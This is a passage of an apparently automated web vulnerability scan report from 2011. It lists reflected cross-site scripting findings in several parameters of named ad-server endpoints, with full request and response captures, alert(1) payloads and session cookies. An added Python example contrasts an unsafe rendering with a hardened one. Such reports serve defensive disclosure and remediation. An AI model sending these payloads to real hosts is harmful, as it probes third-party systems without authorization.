User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=65
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:19 GMT
Connection: close
Content-Length: 4245

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat='f9b86";alert(1)//7be31572be0';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=f9b86";alert(1)//7be31572be0;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                                                                                                       
...[SNIP]...

1.136. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [adRotationId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the adRotationId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67d7d"><script>alert(1)</script>1b977e7ff4d was submitted in the adRotationId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=67d7d"><script>alert(1)</script>1b977e7ff4d&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 2584
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:35 GMT
Connection: close
Vary: Accept-Encoding


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=67d7d"><script>alert(1)</script>1b977e7ff4d&bannerCreativeAdModuleId=21772" Class = "TrackingFrame">
...[SNIP]...

1.137. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [bannerCreativeAdModuleId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the bannerCreativeAdModuleId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0260"><script>alert(1)</script>92954893223 was submitted in the bannerCreativeAdModuleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As in 1.136, the response status is 500 Internal Server Error but the body is still text/html and still carries the unencoded value inside the iframe src attribute.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=c0260"><script>alert(1)</script>92954893223&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 2584
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:30 GMT
Connection: close
Vary: Accept-Encoding


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=c0260"><script>alert(1)</script>92954893223" Class = "TrackingFrame">
...[SNIP]...

1.138. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [campaignId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the campaignId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff6ed"><script>alert(1)</script>f91a4c37806 was appended to the original value (6468) of the campaignId parameter. This input was echoed unmodified in the application's response, in this case inside the HREF of the pipe-delimited clickthrough URL of the A tag rather than the src of the impression iframe, so the same parameter feeds at least two sinks in the page.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468ff6ed"><script>alert(1)</script>f91a4c37806&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:34 GMT
Connection: close
Content-Length: 3930


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<A HREF= "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/?|55|49160|6468ff6ed"><script>alert(1)</script>f91a4c37806|13047|21772|http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/?|2045|48337|6408|15311|21516|http://ad.doubleclick.net/clk;235677179;59315198;b;pc=[TPAS_ID]" TARGET="_BLANK">
...[SNIP]...

1.139. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [campaignId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the campaignId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 262c2"><script>alert(1)</script>cd018174bf0 was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=262c2"><script>alert(1)</script>cd018174bf0&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:34 GMT
Connection: close
Content-Length: 3922


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=262c2"><script>alert(1)</script>cd018174bf0&adRotationId=13047&bannerCreativeAdModuleId=21772" Class = "TrackingFrame">
...[SNIP]...

1.140. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [siteId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the siteId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b668a"><script>alert(1)</script>75e7f948bb9 was submitted in the siteId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=b668a"><script>alert(1)</script>75e7f948bb9&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:31 GMT
Connection: close
Content-Length: 3926


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=b668a"><script>alert(1)</script>75e7f948bb9&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772" Class = "TrackingFrame">
...[SNIP]...

1.141. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [siteId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the siteId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5449"><script>alert(1)</script>4c565f3c010 was appended to the original value (55) of the siteId parameter. This input was echoed unmodified in the application's response, here inside the HREF of the clickthrough A tag (the preceding finding shows the same parameter reaching the impression iframe src as well).

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55e5449"><script>alert(1)</script>4c565f3c010&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:31 GMT
Connection: close
Content-Length: 3930


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<A HREF= "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/?|55e5449"><script>alert(1)</script>4c565f3c010|49160|6468|13047|21772|http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/?|2045|48337|6408|15311|21516|http://ad.doubleclick.net/clk;235677179;59315198;b;pc=[TPAS_ID]" TARGET="_BLANK
...[SNIP]...

1.142. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [syndicationOutletId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the syndicationOutletId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71bf0"><script>alert(1)</script>333ca5c3bc5 was submitted in the syndicationOutletId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As with adRotationId and bannerCreativeAdModuleId, the server returned 500 Internal Server Error but the text/html body still contains the unencoded value in the iframe src attribute.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=71bf0"><script>alert(1)</script>333ca5c3bc5&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 2584
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:33 GMT
Connection: close
Vary: Accept-Encoding


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=71bf0"><script>alert(1)</script>333ca5c3bc5&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772" Class = "TrackingFrame">
...[SNIP]...
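Findings 1.136 through 1.142 are one bug seen through seven parameters: integer IDs are concatenated into a tracking URL and the URL is dropped into a double-quoted attribute with no encoding. The following Python is an added example, not part of the scanner report and not the vindicosuite source (which is not on the page). render_impression_iframe_unsafe is a hypothetical reconstruction of the concatenation the responses imply; render_impression_iframe_safe shows the two independent fixes a reviewer would ask for, a digits-only allow-list on every ID and context-correct encoding (URL encoding for the query string, attribute encoding for the src value). Parameter names, the tracking URL and the payload are taken from the report; the parsing check uses the standard library only.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlencode

TRACKING_BASE = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/"
ID_PARAMS = ("siteId", "syndicationOutletId", "campaignId",
             "adRotationId", "bannerCreativeAdModuleId")
# Every parameter in the report is a small positive integer; allow-list that
# shape instead of trying to blacklist dangerous characters.
INT_ID = re.compile(r"[0-9]{1,12}")


def render_impression_iframe_unsafe(params):
    """Hypothetical reconstruction of the vulnerable pattern: the query string is
    built by concatenation and placed in a double-quoted attribute unencoded,
    so a value containing '">' closes both the attribute and the tag."""
    query = "&".join(f"{name}={params.get(name, '')}" for name in ID_PARAMS)
    return f'<iframe src = "{TRACKING_BASE}?{query}" Class = "TrackingFrame">'


def require_int_id(params, name):
    value = params.get(name, "")
    if not INT_ID.fullmatch(value):
        raise ValueError(f"{name}: expected an integer id, got {value!r}")
    return value


def render_impression_iframe_safe(params):
    """Hardened version. Layer 1: every id must be all digits. Layer 2: encode
    for each context the value passes through (urlencode for the query string,
    html.escape for the attribute). Either layer alone stops the report's payload."""
    ids = {name: require_int_id(params, name) for name in ID_PARAMS}
    url = f"{TRACKING_BASE}?{urlencode(ids)}"
    return f'<iframe src="{html.escape(url, quote=True)}" class="TrackingFrame"></iframe>'


def encode_for_attribute_only(value):
    """The encoding layer on its own, for a value that could not be validated."""
    return html.escape(urlencode({"adRotationId": value}), quote=True)


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup):
    """Parse the markup the way a browser would and list the tags it creates;
    an intact iframe yields exactly ['iframe'], a breakout adds 'script'."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


# Constructed inputs: the benign ids from the report and the 1.136 payload.
BENIGN = {"siteId": "55", "syndicationOutletId": "49160", "campaignId": "6468",
          "adRotationId": "13047", "bannerCreativeAdModuleId": "21772"}
ATTACK = dict(BENIGN, adRotationId='67d7d"><script>alert(1)</script>1b977e7ff4d')


def demo():
    """Returns (unsafe markup grew a script tag, safe renderer rejected payload,
    safe markup for the benign ids)."""
    unsafe = render_impression_iframe_unsafe(ATTACK)
    try:
        render_impression_iframe_safe(ATTACK)
        rejected = False
    except ValueError:
        rejected = True
    return tags_in(unsafe) != ["iframe"], rejected, render_impression_iframe_safe(BENIGN)


if __name__ == "__main__":
    broke_out, rejected, safe_markup = demo()
    print("unsafe markup creates extra tags:", broke_out)
    print("safe renderer rejected the payload:", rejected)
    print(safe_markup)
```

Run stand-alone, the script parses its own output the way a browser would, which is a stronger check than grepping for the canary: the unsafe rendering yields an iframe followed by a script element, the safe rendering yields a single iframe whose src still contains adRotationId=13047.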

1.143. http://cache.vindicosuite.com/xumo/libs/vindicosuite/xumoJS/prod/vindicosuite.xumo.js.asp [coad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /xumo/libs/vindicosuite/xumoJS/prod/vindicosuite.xumo.js.asp

Issue detail

